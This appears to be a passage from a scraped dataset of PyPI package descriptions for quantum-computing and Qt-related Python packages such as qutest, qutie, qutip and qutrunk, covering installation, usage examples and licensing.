valueDEBUGmeans thatqutestwill run in the \"debug mode\",\nin which it will NOT launch the host executables and it will wait for the\nTarget reset and other responses from the Target. Ifhost_exeis not\nspecified, anembedded targetis assumed (which is loaded with the test\nfixture alredy).qspy_host[:udp_port]- optional host-name/IP-address:port for the host\nrunning the QSPY host utility. If not specified, the default\nis 'localhost:7701'.tcp_port- optional the QSpy TCP port number for connecting\nhost executables. If not specified, the default is '6601'.NOTE:For reliable operation it is recommended to apply the short options without a space between the option and the parameter (e.g., 1-q192.168.1.100, -ocx1).Examples (for Windows):[1] python3 %QTOOLS%\\qutest\\qutest.py\n[2] python3 %QTOOLS%\\qutest\\qutest.py -- test_mpu.py\n[3] python3 %QTOOLS%\\qutest\\qutest.py -ebuild/test_dpp.exe\n[4] python3 %QTOOLS%\\qutest\\qutest.py -ebuild/test_dpp.exe -q192.168.1.100 -l../log -oco\n[5] qutest -qlocalhost:7702 -oxc -- test_qk.py,test_mpu.py\n[6] python3 %QTOOLS%\\qutest\\qutest.py -eDEBUG -- test_mpu.py[1]runs all test scripts (*.py) in the current directory on a remote target connected to QSPU host utility.[2]runs the test script test_mpu.py in the current directory on a remote target connected to QSPU host utility.[3]runs all test scripts (*.py) in the current directory and uses the host executable build/test_dpp.exe (test fixture).[4]runs all test scripts (*.py) in the current directory, uses the host executable build/test_dpp.exe (test fixture), and connects to QSPY running on a machine with IP address 192.168.1.100. Also produces QUTest log (-l) in the directory ../log. Also clears the QUTest screen before the run (-oc) and causes QSPY to save the text output to a file (-oo)[5]runs \"qutest\" (installed with pip) to execute the test scripts test_qk.py,test_mpu.py in the current directory, and connects to QSPY at UDP-host:port localhost:7701.[6]runs \"qutest\" in the DEBUG mode to execute the test script test_mpu.py in the current directory.Examples (for Linux/macOS):[1] python3 $(QTOOLS)/qutest/qutest.py\n[2] python3 $(QTOOLS)/qutest/qutest.py -- test_mpu.py\n[3] python3 $(QTOOLS)/qutest/qutest.py -ebuild/test_dpp\n[4] python3 $(QTOOLS)/qutest/qutest.py -ebuild/test_dpp -q192.168.1.100 -l../log -oco\n[5] qutest -qlocalhost:7702 -oxc -- test_qk.py,test_mpu.py\n[6] python3 $(QTOOLS)/qutest/qutest.py -eDEBUG -- test_mpu.py[1]runs all test scripts (*.py) in the current directory on a remote target connected to QSPU host utility.[2]runs the test script test_mpu.py in the current directory on a remote target connected to QSPU host utility.[3]runs all test scripts (*.py) in the current directory and uses the host executable build/test_dpp (test fixture).[4]runs all test scripts (*.py) in the current directory, uses the host executable build/test_dpp (test fixture), and connects to QSPY running on a machine with IP address 192.168.1.100. Also produces QUTest log (-l) in the directory ../log. Also clears the QUTest screen before the run (-oc) and causes QSPY to save the text output to a file (-oo)[5]runs \"qutest\" (installed with pip) to execute the test scripts test_qk.py,test_mpu.py in the current directory, and connects to QSPY at UDP-host:port localhost:7701.[6]runs \"qutest\" in the DEBUG mode to execute the test script test_mpu.py in the current directory.Generating Test LogsAs required for safety certification, thequtest.pytest runner can generate permanent records of the runs by producing log files. This feature is enabled by the-lcommand-line option.The various make-files supplied in QP/C and QP/C++ allow you to supply the command-line options for saving QUTest logs (by defining theLOG=symbol while invokingmake), for example:[1] make LOG=.\n[2] make LOG=../log\n[3] make LOG=c:/cert/logs[1]generates QUTest log file in the current directory (.)[2]generates QUTest log file in the../logdirectory (relative to the current directory)[3]generates QUTest log file in the absolute directoryc:/cert/logsThe following following listing shows the generated log file:Run ID : 221221_161550\nTarget : build/test_qutest.exe\n\n===================================[group]====================================\ntest_assert.py\n\nThis test group contains tests that intenionally FAIL,\nto exercise failure modes of the QUTest system.\n\n[ 1]--------------------------------------------------------------------------\nExpected assertion\n [ PASS ( 0.1s) ]\n[ 2]--------------------------------------------------------------------------\nUnexpected assertion (should FAIL!)\n @test_assert.py:22\nexp: \"0000000002 COMMAND CMD_A 0\"\ngot: \"0000000002 =ASSERT= Mod=test_qutest,Loc=100\"\n! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ![ FAIL ( 0.2s) ]\n[ 3]--------------------------------------------------------------------------\nSimple passing test\n [ PASS ( 0.1s) ]\n[ 4]--------------------------------------------------------------------------\nWrong assertion expectation (should FAIL!)\n @test_assert.py:32\nexp: \"0000000002 =ASSERT= Mod=test_qutest,Loc=200\"\ngot: \"0000000002 =ASSERT= Mod=test_qutest,Loc=100\"\n! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ![ FAIL ( 1.1s) ]\n[ 5]--------------------------------------------------------------------------\nSimple passing test\n [ PASS ( 0.1s) ]\n\n=================================[ SUMMARY ]==================================\n\nTarget ID : 221221_161031 (QP-Ver=720)\nLog file : ./qutest221221_161550.txt\nGroups : 1\nTests : 5\nSkipped : 0\nFAILED : 2 [ 2 4 ]\n\n==============================[ FAIL ( 2.7s) ]===============================More InformationMore information about the QUTest unit testing harness is available\nonline at:https://www.state-machine.com/qtools/qutest.htmlMore information about the QP/QSPY software tracing system is available\nonline at:https://www.state-machine.com/qtools/qpspy.html"} +{"package": "qute-style", "pacakge-description": "QuteStyleQuteStyle is an expandable application framework for PySide6 and heavily inspired byPyDracula.\nThe main goal of this project is to provide a simple and easy to use application frame that can be used to create a new application.\nIt is mainly suited for applications that rely on a center widget for user interaction. Functionality is extendable by having different widgets that can be loaded into that center widget area.Project statusTestsPackageFeaturesEasy integration of already existing widgetsPreset themes that easily can be modifiedCustom widgetsSplash screenBuild-in release historyUsed and developed in a productive environmentThemes and Styled WidgetsQuteStyle provides five themes, defining the color composition of the app.\nAdditionally, the user can define new themes (check this out). We provide five themes, for example a dark and light modeDarculaandHighbridge Grey.\nWe definedcustom widgets, such that they fit to the overall style and implemented new behaviour. A selection can be found in the Test-App:RequirementsPython 3.10+PySide6Installation Methodpip install qute-styleUsageimportsysfromqute_style_examples.sample_main_windowimportStyledMainWindowfromqute_style.qs_applicationimportQuteStyleApplicationfromqute_style.update_windowimportAppDataclassMyApplication(QuteStyleApplication):# take a look at qute_style_examples.sample_main_window and qute_style_examples.sample_widgets# to find out more about setting up a main window and the widgets that it# should displayMAIN_WINDOW_CLASS=StyledMainWindow# add basic information about your applicationAPP_DATA=AppData(\"Test-App\",\"2.3.4\",\":/svg_images/logo_qute_style.svg\",\":/svg_images/logo_qute_style.svg\",\"\",\"Test Version\",)if__name__==\"__main__\":APP_NAME=\"Test-App\"app=MyApplication(sys.argv)sys.exit(app.exec())For further information, see ourdocumentation.ExampleCheck out our example app by running:python -m qute_style_examplesLicenseThe original design idea is fromWanderson-Magalhaesand his projectPyDracula(MIT License).\nThe svg files are derived fromMaterial design icons(Apache License Version 2.0). Other files are covered by QuteStyle's MIT license.ContributingAll contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome."} +{"package": "qutewindow", "pacakge-description": "Qute WindowCross-platform frameless window based on Python and QtExamplesQute Window on macOSQute Window on WindowsFeaturesMoving (the title bar area is draggable)StretchingNative window shadowNative window animationsWin11 snap layoutInstalling via PIPpipinstallqutewindowUsageHere is a minimal example:importsysfromPySide6.QtWidgetsimportQApplicationfromqutewindowimportQuteWindowif__name__==\"__main__\":app=QApplication(sys.argv)demo=QuteWindow()demo.show()sys.exit(app.exec())"} +{"package": "qutie", "pacakge-description": "QutieYet another pythonic UI library for rapid prototyping using PyQt5.Quick startimportqutieasuiapp=ui.Application()window=ui.Widget(title=\"Example\",icon='orange',width=320,height=240,layout=ui.Column(ui.Label(\"Hello world!\"),ui.Row(ui.Button(\"Go!\",clicked=lambda:ui.show_info(text=\"Hello world!\")),ui.Button(\"Quit\",clicked=app.quit))))window.show()app.run()DocumentationQutie (pronounced ascutie) provides a simple and easy to use pythonic\ninterface to PyQt5.InstallpipinstallqutieApplicationA singleApplicationobject must be created before other widgets. To make use\nof the event system the application event loop must be executed.importqutieasui# Create an application object.app=ui.Application(name='app',version='1.0')# Create a window.window=ui.MainWindow()window.resize(800,600)window.show()# Run the event loop.app.run()WidgetsAny widget can be a top level window or part of another widget using thelayoutproperty. All properties can be assigned using the constructor.window=ui.Widget(title=\"Example\",width=320,height=240)To make a top level window visible use propertyvisibleor call methodshow().window.show()window.visible=True# equivalent to showLayoutsThe simplified layout system provides a horizontalRowand a verticalColumnbox. Items can be added while constructing the layout or using list like methodsappendandinsert. The consumed space of every child widget can be adjusted\nusing thestretchattribute.window.layout=ui.Row(ui.Column(...),ui.Column(ui.Row(...),ui.Row(...),ui.Row(...),stretch=(1,0,0)),stretch=(2,3))Inputs# Single line text inputtext=ui.Text(value=\"spam\")# Numeric inputnumber=ui.Number(value=4,minimum=0,maximum=10,step=1.0,decimals=1)# A multi line text areatextarea=ui.TextArea(value=\"Lorem ipsum et dolor.\")EventsEvents provide a simplified interface to Qt's signal and slot system. Events can\nbe emitted from any class inheriting fromObjectby calling methodemit().# Use any callable class attribute as event callback.window.issue_call=lambda:print(\"Call to action!\")# Emit an event executing attribute `issue_call` (if callable).window.emit('issue_call')Events can also propagate positional and keyword arguments.# Use any callable class attribute as event callback.window.update_progress=lambdaa,b:print(f\"Progress:{a}of{b}\")# Emit an event executing attribute `update_progress` (if callable).window.emit('update_progress',42,100)Many widgets provide predefined events.# Assigning callback functionsui.Number(value=4,changed=on_change,editing_finished=on_edited)TimersCall repeating or delayed events using timers.timer=ui.Timer(interval=1.0,timeout=lambda:print(\"Done!\"))timer.start()Functionsingle_shotexposes a convenient single shot timer.ui.single_shot(interval=1.0,timeout=lambda:print(\"Done!\"))Note that timer events are only processed when running the application event\nloop.SettingsPersistent settings can be stored/restored using aSettingsobject as context\nmanager. It provides application wide settings as a JSON dictionary.withui.Settings()assettings:value=settings.get('key','default')settings['key']=valueUse attributefilenameto inspect the persistent JSON data.>>>ui.Settings().filename'/home/user/.config/app.qutie'MenusMenu bars and menus behave like python lists.window=ui.MainWindow()file_menu=window.menubar.append(\"&File\")quit_action=file_menu.append(\"&Quit\")quit_action.triggered=window.closefoo_menu=window.menubar.insert(window.menubar.index(file_menu),\"&Foo\")file_menu=window.menubar.remove(file_menu)ToolbarsToolbars also behave like python lists, the main window toolbars property\nbehaves like a set.window=ui.MainWindow()toolbar=window.toolbars.add(\"toolbar\")toolbar.append(quit_action)toolbar.insert(quit_action)window.toolbars.remove(toolbar)WorkersTheWorkerclass provides a convenient way to work with background threads.\nUse attributetargetto assign the function to be executed in the background.defcalculate(worker):foriinrange(100):...worker=ui.Worker(target=calculate)worker.start()Important:use only the event system to propagate information from inside\nthe worker. Do not access widgets from within the worker function.defcalculate(worker):foriinrange(100):# Emit custom events.worker.emit('progress',i,100)worker.emit('message',\"All ok...\")worker=ui.Worker(target=calculate)# Assign custom event callbacks.worker.progress=lambdastep,max:print(f\"progress:{step}/{max}\")worker.message=lambdamsg:print(f\"message:{msg}\")worker.start()To control worker lifetime use methodstop()and attributestopping.defcalculate(worker):whilenotworker.stopping:...worker=ui.Worker(target=calculate)worker.start()...worker.stop()To wait for a worker to actually stop use methodjoin().worker.stop()worker.join()ExampleA simple dialog with progress bar running a calculation in the background.importrandomimporttimeimportqutieasuiclassDialog(ui.Dialog):def__init__(self,**kwargs):super().__init__(**kwargs)# Create workerself.worker=ui.Worker(target=self.calculate)self.worker.finished=self.closeself.worker.update_progress=self.update_progress# Create layoutself.progress_bar=ui.ProgressBar()self.layout=self.progress_bardefrun(self):# Start, stop and join workerself.worker.start()super().run()self.worker.stop()self.worker.join()defupdate_progress(self,value,maximum):self.progress_bar.maximum=maximumself.progress_bar.value=valuedefcalculate(self,worker):n=32foriinrange(n):ifworker.stopping:break# Emit custom eventworker.emit('update_progress',i,n)time.sleep(random.random())app=ui.Application()dialog=Dialog(title=\"Worker\")dialog.run()Something missing?Any underlying PyQt5 instance can be accessed directly using propertyqt.\nThis also enables to mix in custom PyQt5 classes and instances.widget.qt.setWindowTitle(\"Spam!\")widget.qt.customContextMenuRequested.connect(lambdapos:None)widget.qt.layout().addWidget(QtWidgets.QPusbButton())LicenseQutie is licensed under theGNU General Public License Version 3."} +{"package": "qutil", "pacakge-description": "qutilqutil is a simple library to test and execute SQL scripts from pythonInstallationUse the package managerpipto install qutil.pipinstallqutilLocal BuildCompile#file build on /buildpythonsetup.pysdist#.tar.gz build on /distpythonsetup.pysdistbdist_wheelInstallpipinstalldist/qutil-[version].tar.gz"} +{"package": "qutils", "pacakge-description": "UNKNOWN"} +{"package": "qutip", "pacakge-description": "QuTiP: Quantum Toolbox in PythonA. Pitchford,C. Granade,A. Grimsmo,N. Shammah,S. Ahmed,N. Lambert,E. Gigu\u00e8re,B. Li,J. Lishman,S. Cross,A. Galicia,P. D. Nation,\nandJ. R. JohanssonQuTiP is open-source software for simulating the dynamics of closed and open quantum systems.\nIt uses the excellent Numpy, Scipy, and Cython packages as numerical backends, and graphical output is provided by Matplotlib.\nQuTiP aims to provide user-friendly and efficient numerical simulations of a wide variety of quantum mechanical problems, including those with Hamiltonians and/or collapse operators with arbitrary time-dependence, commonly found in a wide range of physics applications.\nQuTiP is freely available for use and/or modification, and it can be used on all Unix-based platforms and on Windows.\nBeing free of any licensing fees, QuTiP is ideal for exploring quantum mechanics in research as well as in the classroom.SupportWe are proud to be affiliated withUnitary FundandnumFOCUS.\nQuTiP development is supported byNori's labat RIKEN, by the University of Sherbrooke, and by Aberystwyth University,among other supporting organizations.InstallationQuTiP is available on bothpipandconda(the latter in theconda-forgechannel).\nYou can install QuTiP frompipby doingpipinstallqutipto get the minimal installation.\nYou can instead use the targetqutip[full]to install QuTiP with all its optional dependencies.\nFor more details, including instructions on how to build from source, seethe detailed installation guide in the documentation.All back releases are also available for download in thereleases section of this repository, where you can also find per-version changelogs.\nFor the most complete set of release notes and changelogs for historic versions, see thechangelogsection in the documentation.DocumentationThe documentation for official releases, in HTML and PDF formats, can be found in thedocumentation section of the QuTiP website.\nThe latest development documentation is available in this repository in thedocfolder.Aselection of demonstration notebooks is available, which demonstrate some of the many features of QuTiP.\nThese are stored in thequtip/qutip-notebooks repositoryhere on GitHub.\nYou can run the notebooks online using myBinder:ContributeYou are most welcome to contribute to QuTiP development by forking this repository and sending pull requests, or filing bug reports at theissues page.\nYou can also help out with users' questions, or discuss proposed changes in theQuTiP discussion group.\nAll code contributions are acknowledged in thecontributorssection in the documentation.For more information, including technical advice, please see the\"contributing to QuTiP development\" section of the documentation.Citing QuTiPIf you use QuTiP in your research, please cite the original QuTiP papers that are availablehere."} +{"package": "qutip-qip", "pacakge-description": "qutip-qipThe qutip-qip package used to be a modulequtip.qipunderQuTiP (Quantum Toolbox in Python).\nFrom QuTiP 5.0, the community has decided to decrease the size of the core QuTiP package by reducing the external dependencies, in order to simplify maintenance.\nHence a few modules are separated from the core QuTiP and will become QuTiP family packages.\nThey are still maintained by the QuTiP team but hosted under different repositories in theQuTiP organization.The qutip-qip package, QuTiP quantum information processing, aims at providing basic tools for quantum computing simulation both for simple quantum algorithm design and for experimental realization.\nCompared to other libraries for quantum information processing, qutip-qip puts additional emphasis on the physics layer and the interaction with the QuTiP package.\nThe package offers two different approaches for simulating quantum circuits, one withQubitCircuitcalculating unitary evolution under quantum gates by matrix product, another calledProcessorusing open system solvers in QuTiP to simulate noisy quantum device.If you would like to know the future development plan and ideas, have a look at thediscussion panelas well as thequtip documentation for ideas.Quick startTo install the package, usepip install qutip-qipMigrating fromqutip.qipAs the introduction suggested, this package is based on a module in theQuTiPpackagequtip.qip.\nIf you were using thequtippackage and now want to try out the new features included in this package, you can simply install this package and replace all thequtip.qipin your import statement withqutip_qip. Everything should work smoothly as usual.Documentation and tutorialsThe documentation ofqutip-qipupdated to the latest development version is hosted atqutip-qip.readthedocs.io/.\nTutorials related to using quantum gates and circuits inqutip-qipcan be foundhereand those related to using noise simulators areavailable atthis link.Code examples used in the articlePulse-level noisy quantum circuits with QuTiP, updated for the latest code version, are hosted inthis folder.Installation from sourceIf you want to edit the source code, please download the source code and run the following command under the rootqutip-qipfolder,pip install --upgrade pip\npip install -e .which makes sure that you are up to date with the latestpipversion. Contribution guidelines are availablehere.To build and test the documentation, additional packages need to be installed:pip install pytest matplotlib sphinx numpydoc sphinx_rtd_themeUnder thedocdirectory, usemake htmlto build the documentation, ormake doctestto test the code in the documentation.TestingTo test the installation, choose the correct branch that matches with the version, e.g.,qutip-qip-0.2.Xfor version 0.2. Then download the source code and run from thequtip-qipdirectorypytest testsCitingqutip-qipIf you usequtip-qipin your research, please cite thearticleas@article{Li2022pulselevelnoisy,doi={10.22331/q-2022-01-24-630},url={https://doi.org/10.22331/q-2022-01-24-630},title={Pulse-level noisy quantum circuits with {Q}u{T}i{P}},author={Li, Boxi and Ahmed, Shahnawaz and Saraogi, Sidhant and Lambert, Neill and Nori, Franco and Pitchford, Alexander and Shammah, Nathan},journal={{Quantum}},issn={2521-327X},publisher={{Verein zur F{\\\"{o}}rderung des Open Access Publizierens in den Quantenwissenschaften}},volume={6},pages={630},month=jan,year={2022}}SupportThis package is supported and maintained by the same developers group as QuTiP.QuTiP development is supported byNori's labat RIKEN, by the University of Sherbrooke, by Chalmers University of Technology, by Macquarie University and by Aberystwyth University,among other supporting organizations.LicenseYou are free to use this software, with or without modification, provided that the conditions listed in the LICENSE.txt file are satisfied."} +{"package": "qutip-qtrl", "pacakge-description": "qutip-qtrlThe qutip-qtrl package used to be a modulequtip.controlunderQuTiP (Quantum Toolbox in Python).\nFrom QuTiP 5.0, the community has decided to decrease the size of the core QuTiP package by reducing the external dependencies, in order to simplify maintenance.\nHence a few modules are separated from the core QuTiP and will become QuTiP family packages.\nThey are still maintained by the QuTiP team but hosted under different repositories in theQuTiP organization.The qutip-qtrl package, QuTiP quantum optimal control, aims at providing advanced tools for the optimal control of quantum devices.\nCompared to other libraries for quantum optimal control, qutip-qtrl puts additional emphasis on the physics layer and the interaction with the QuTiP package.\nThe package offers support for both the CRAB and GRAPE methods.If you would like to know the future development plan and ideas, have a look at thequtip documentation for ideas.Quick startTo install the package, usepip install qutip-qtrlMigrating fromqutip.controlAs the introduction suggested, this package is based on a module in theQuTiPpackagequtip.control.\nIf you were using thequtippackage and now want to try out the new features included in this package, you can simply install this package and replace all thequtip.controlin your import statement withqutip_qtrl. Everything should work smoothly as usual.Documentation and tutorialsThe documentation ofqutip-qtrlupdated to the latest development version is hosted atqutip-qtrl.readthedocs.io/.\nTutorials related to using quantum optimal control inqutip-qtrlcan be foundhere.Installation from sourceIf you want to edit the source code, please download the source code and run the following command under the rootqutip-qtrlfolder,pip install --upgrade pip\npip install -e .which makes sure that you are up to date with the latestpipversion. Contribution guidelines are availablehere.To build and test the documentation, additional packages need to be installed:pip install pytest matplotlib sphinx numpydoc sphinx_rtd_themeUnder thedocdirectory, usemake htmlto build the documentation, ormake doctestto test the code in the documentation.TestingTo test the installation, choose the correct branch that matches with the version, e.g.,qutip-qtrl-0.2.Xfor version 0.2. Then download the source code and run from thequtip-qtrldirectory.pytest testsCitingqutip-qtrlIf you usequtip-qtrlin your research, please cite the original QuTiP papers that are availablehere.SupportThis package is supported and maintained by the same developers group as QuTiP.QuTiP development is supported byNori's labat RIKEN, by the University of Sherbrooke, by Chalmers University of Technology, by Macquarie University and by Aberystwyth University,among other supporting organizations.LicenseYou are free to use this software, with or without modification, provided that the conditions listed in the LICENSE.txt file are satisfied."} +{"package": "qutk", "pacakge-description": "No description available on PyPI."} +{"package": "qutorch", "pacakge-description": "Framework to simulate quantum circuits with PyTorch.# DescriptionIt consists of one main module:q_simulator: main simulator to run quantum circuits# Installation## Normal installation`bash pip install qutorch `## Development installation`bash git clonehttps://github.com/MarioDuran/qutorch.gitcd qutorch pip install--editable. `"} +{"package": "qutree", "pacakge-description": "OverviewPlot sets of multiqubit quantum pure states as a binary tree of Bloch spheres.We present a representation that can display several arbitrary multi-qubit pure states, using a combination of the Bloch Sphere and the Schmidt decomposition.Our current approaches to visualization of quantum states allow to display:several mono-qubit states, using the Bloch spherea single multi-qubit state, sometimes with additional restrictions such as symmetryUsageinstall with pip:pip install qutreeAnd you will be able to produce this type of Bloch sphere\u2019s tree:More information can be found in ourdocumentation.CitingIf you find qutree useful in your research, please consider citing the following papers to support our work. Thank you for your support.Barthe, A., Grossi, M., Tura, J., and Dunjko, V.. (2023). Bloch Sphere Binary Trees: A method for the visualization of sets of multi-qubit systems pure states.https://doi.org/10.48550/arXiv.2302.02957ContributeIf you want to contribute you can fork the project in your own repository and then use it. If you consider working with us, please follow thecontributing guidelines.Meet ourcontributor."} +{"package": "qutritium", "pacakge-description": "IMAGE REFERENCEQutritiumWhat is Qutritium?It is a Python package that provides qutrit processing techniques such as calibration and decomposition, etc (not exclusive).Qutritium enables students researchers to run a qutrit system on available quantum computers which mainly comes from IBM cloud quantum computers.\ud83d\udce6 InstallationQutritiumruns in python environment. User can download newest python releasedhere.Recommendation:Anacondafor environment separationpipinstallqutritium\u2705 Qutritium Available FunctionsProtocolPurpose and functionalitiesCalibration...Virtual Machine...Decomposition...\u270d\ufe0f Usage/Examplesfromqutritium.calibrationimportTR01\ud83d\udc65 AuthorsSon PhamTien NguyenBao Bach\ud83e\uddfeLicenseMIT License\ud83d\udccc DocumentationDocumentation"} +{"package": "qutrunk", "pacakge-description": "QuTrunk\u6982\u8ff0QuTrunk \u662f\u542f\u79d1\u91cf\u5b50\u81ea\u4e3b\u7814\u53d1\u7684\u4e00\u6b3e\u514d\u8d39\u3001\u5f00\u6e90\u3001\u8de8\u5e73\u53f0\u7684\u91cf\u5b50\u8ba1\u7b97\u7f16\u7a0b\u6846\u67b6\uff0c\u5305\u62ec\u91cf\u5b50\u7f16\u7a0bAPI\u3001\u91cf\u5b50\u547d\u4ee4\u8f6c\u8bd1\u3001\u91cf\u5b50\u8ba1\u7b97\u540e\u7aef\u63a5\u53e3\u7b49\u3002QuTrunk \u4f7f\u7528 Python \u4f5c\u4e3a\u5bbf\u4e3b\u8bed\u8a00\uff0c\u5229\u7528 Python \u7684\u8bed\u6cd5\u7279\u6027\u5b9e\u73b0\u9488\u5bf9\u91cf\u5b50\u7a0b\u5e8f\u7684 DSL (\u9886\u57df\u4e13\u7528\u8bed\u8a00)\uff0c\u6240\u6709\u4f7f\u7528 Python \u7f16\u7a0b\u7684 IDE \u5747\u53ef\u4f7f\u7528\u5b89\u88c5\u3002QuTrunk \u57fa\u4e8e\u91cf\u5b50\u903b\u8f91\u95e8\u3001\u91cf\u5b50\u7ebf\u8def\u7b49\u6982\u5ff5\u63d0\u4f9b\u91cf\u5b50\u7f16\u7a0b\u6240\u9700\u5404\u7c7b API\uff0c\u8fd9\u4e9b API \u7531\u76f8\u5e94\u7684\u6a21\u5757\u5b9e\u73b0\u3002\u4f8b\u5982 QCircuit \u5b9e\u73b0\u91cf\u5b50\u7ebf\u8def\uff0cQubit \u5b9e\u73b0\u91cf\u5b50\u6bd4\u7279\uff0cQureg \u5b9e\u73b0\u91cf\u5b50\u5bc4\u5b58\u5668\uff0cCommand \u5b9e\u73b0\u6bcf\u4e2a\u91cf\u5b50\u95e8\u64cd\u4f5c\u7684\u6307\u4ee4\uff0cBackend \u5b9e\u73b0\u8fd0\u884c\u91cf\u5b50\u7ebf\u8def\u7684\u540e\u7aef\u6a21\u5757\uff0cgate \u6a21\u5757\u5b9e\u73b0\u5404\u7c7b\u57fa\u7840\u91cf\u5b50\u95e8\u64cd\u4f5c\u3002QuTrunk \u8fd8\u53ef\u4ee5\u4f5c\u4e3a\u5176\u4ed6\u4e0a\u5c42\u91cf\u5b50\u8ba1\u7b97\u5e94\u7528\u7684\u57fa\u7840\uff0c\u4f8b\u5982\uff1a\u91cf\u5b50\u7b97\u6cd5\u3001\u91cf\u5b50\u53ef\u89c6\u5316\u7f16\u7a0b\u3001\u91cf\u5b50\u673a\u5668\u5b66\u4e60\u7b49\u3002QuTrunk\u5185\u90e8\u6a21\u5757\u5212\u5206\u53ca\u5c42\u6b21\u7ed3\u6784\u5982\u4e0b\uff1a\u6838\u5fc3\u6a21\u5757cicuit: \u91cf\u5b50\u7ebf\u8def\uff0c\u901a\u8fc7\u5e94\u7528\u5404\u7c7b\u57fa\u7840\u95e8\u64cd\u4f5c\u4ee5\u53ca\u7b97\u7b26\u64cd\u4f5c\u6784\u5efa\u91cf\u5b50\u7ebf\u8def\uff0c\u4ee3\u8868\u4e86\u6574\u4e2a\u91cf\u5b50\u7b97\u6cd5\u7684\u5b9e\u73b0\u3002qubit: \u4ee3\u8868\u5355\u4e2a\u91cf\u5b50\u6bd4\u7279\uff0c\u662f\u91cf\u5b50\u95e8\u548c\u91cf\u5b50\u7b97\u7b26\u64cd\u4f5c\u7684\u76ee\u6807\u5bf9\u8c61\u3002qureg: \u7528\u4e8e\u7533\u8bf7\u91cf\u5b50\u8ba1\u7b97\u8d44\u6e90\uff0c\u7ef4\u62a4\u82e5\u5e72\u4e2a\u91cf\u5b50\u6bd4\u7279\uff0c\u7528\u4e8e\u5b9e\u73b0\u67d0\u4e2a\u5177\u4f53\u7684\u91cf\u5b50\u7b97\u6cd5\u3002gate: \u91cf\u5b50\u903b\u8f91\u95e8\u6a21\u5757\uff0c\u63d0\u4f9b\u5404\u7c7b\u57fa\u7840\u91cf\u5b50\u95e8\u64cd\u4f5c\uff0c\u5305\u62ec:H,X,Y,Z\uff0cP,R,Rx,Ry,Rz,S,Sdg,T,Tdg,CNOT,Toffoli,Swap\u7b49\u3002operator: \u91cf\u5b50\u7b97\u7b26\u64cd\u4f5c\uff0c\u901a\u8fc7\u82e5\u5e72\u57fa\u7840\u91cf\u5b50\u95e8\u5b9e\u73b0\u67d0\u4e9b\u901a\u7528\u91cf\u5b50\u64cd\u4f5c\uff0c\u6bd4\u5982\u632f\u5e45\u653e\u5927QAA, \u91cf\u5b50\u5085\u7acb\u53f6\u53d8\u6362QFT\u7b49\u3002command: \u5bf9\u91cf\u5b50\u7ebf\u8def\u4e2d\u6240\u6709\u95e8\u7ea7\u64cd\u4f5c\u505a\u53c2\u6570\u5316\u5904\u7406\uff0c\u5bf9\u63a5\u76ee\u6807\u540e\u7aef\u6a21\u5757\uff0c\u7528\u4e8e\u8fd0\u884c\u6574\u4e2a\u91cf\u5b50\u7ebf\u8def\u3002qasm: \u517c\u5bb9OpenQASM 2.0\u6807\u51c6\uff0c\u5b9e\u73b0\u91cf\u5b50\u7ebf\u8def\u5230OpenQASM\u6307\u4ee4\u7684\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u3002qusl: QuTrunk\u91cf\u5b50\u6c47\u7f16\u6807\u51c6\uff0c\u5b9e\u73b0\u4e0eqasm\u7c7b\u4f3c\u529f\u80fd\u3002backend: \u91cf\u5b50\u8ba1\u7b97\u540e\u7aef\u6a21\u5757\uff0c\u7528\u4e8e\u6267\u884c\u91cf\u5b50\u7ebf\u8def\uff0c\u652f\u6301Python\u672c\u5730\u540e\u7aef\uff0cqusprout\u548cqusaas\u4e24\u79cd\u8fdc\u7a0b\u540e\u7aef\u4ee5\u53ca\u7b2c\u4e09\u65b9\u540e\u7aef(\u76ee\u524d\u652f\u6301IBM\u548cAWS Braket)\u3002qusprout: \u5bf9\u63a5\u542f\u79d1\u7814\u5236\u7684qubox\u8bbe\u5907\uff0c\u4f7f\u7528\u7ecf\u5178\u8ba1\u7b97\u8d44\u6e90\u5e76\u9488\u5bf9\u91cf\u5b50\u8ba1\u7b97\u7279\u70b9\u505a\u4f18\u5316\uff0c\u63d0\u4f9b\u9ad8\u6027\u80fd\u91cf\u5b50\u6a21\u62df\u8ba1\u7b97\u670d\u52a1\u3002qusaas: \u5bf9\u63a5\u542f\u79d1\u91cf\u5b50\u8ba1\u7b97\u4e91\u5e73\u53f0\uff0c\u63a5\u5165\u591a\u79cd\u91cf\u5b50\u8ba1\u7b97\u8d44\u6e90\uff0c\u5305\u62ec\u7ecf\u5178\u8ba1\u7b97\u8d44\u6e90\uff0c\u79bb\u5b50\u9631\u91cf\u5b50\u8ba1\u7b97\u673a\uff08\u7814\u53d1\u4e2d\uff09\u3002\u4e3b\u8981\u7279\u70b9\u57fa\u4e8e\u91cf\u5b50\u903b\u8f91\u95e8\u3001\u91cf\u5b50\u7b97\u7b26\u548c\u91cf\u5b50\u7ebf\u8def\u5b9e\u73b0\u91cf\u5b50\u7a0b\u5e8f\u5f00\u53d1\u3002\u63d0\u4f9bQuSL\u91cf\u5b50\u6c47\u7f16\u6307\u4ee4\u6807\u51c6\uff0cQuSL\u91cf\u5b50\u6c47\u7f16\u4e0ePython\u4ee3\u7801\u5b8c\u5168\u517c\u5bb9\u3002\u8bbe\u5907\u72ec\u7acb\uff0c\u540c\u4e00\u4e2a\u91cf\u5b50\u7ebf\u8def\u53ea\u9700\u66ff\u6362\u540e\u7aef\u7c7b\u578b\u5373\u53ef\u4ee5\u5728\u4e0d\u540c\u7684\u91cf\u5b50\u540e\u7aef\u4e0a\u8fd0\u884c\u3002\u63d0\u4f9b\u591a\u79cd\u91cf\u5b50\u8ba1\u7b97\u4f53\u9a8c\uff0c\u672c\u5730\u91cf\u5b50\u8ba1\u7b97\u63d0\u4f9bPython\u8ba1\u7b97\u540e\u7aef\uff0c\u8fdc\u7a0b\u540e\u7aef\u63d0\u4f9bOMP\u591a\u7ebf\u7a0b\u3001MPI\u591a\u8282\u70b9\u5e76\u884c\u3001GPU\u52a0\u901f\u7b49\u8ba1\u7b97\u6a21\u5f0f\uff0c\u540c\u65f6\u9884\u7559\u4e86\u63a5\u53e3\u5bf9\u63a5\u542f\u79d1\u91cf\u5b50\u81ea\u884c\u7814\u5236\u7684\u79bb\u5b50\u9631\u91cf\u5b50\u8ba1\u7b97\u673a\u3002\u517c\u5bb9\u591a\u79cd\u91cf\u5b50\u6c47\u7f16\u6307\u4